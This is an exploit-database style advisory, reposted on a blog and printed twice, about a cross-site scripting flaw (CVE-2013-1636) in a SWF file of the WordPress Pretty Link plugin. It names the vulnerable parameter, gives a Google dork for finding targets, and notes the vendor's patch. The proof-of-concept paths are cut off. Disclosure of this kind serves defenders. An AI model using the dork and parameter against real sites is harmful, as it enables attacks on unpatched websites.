# Exploit Title: Wordpress pretty-link‏ plugin XSS in SWF
# Release Date: 20/02/13
# Author: hip [Insight-Labs]
# Contact: hip@insight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.
# Vendor Homepage: http://prettylinkpro.com/
# Tested on: XPsp3
# Affected version: 1.6.3 before
# Google Dork: inurl:/wp-content/plugins/
# REF:CVE-2013-1636
------------------------------
# Introduction:
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
------------------------------
# XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-
vulnerabile parameter:get-data
POC:
/wp-content/plugins/pretty-
------------------------------
# Patch:
-- Vendor was notified on the 23/01/2013
-- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug
-- REF:http://wordpress.org/
------------------------------
Courtesy: securityfocus.com
# Release Date: 20/02/13
# Author: hip [Insight-Labs]
# Contact: hip@insight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.
# Vendor Homepage: http://prettylinkpro.com/
# Tested on: XPsp3
# Affected version: 1.6.3 before
# Google Dork: inurl:/wp-content/plugins/
# REF:CVE-2013-1636
------------------------------
# Introduction:
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
------------------------------
# XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-
vulnerabile parameter:get-data
POC:
/wp-content/plugins/pretty-
------------------------------
# Patch:
-- Vendor was notified on the 23/01/2013
-- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug
-- REF:http://wordpress.org/
------------------------------
Courtesy: securityfocus.com
No comments:
Post a Comment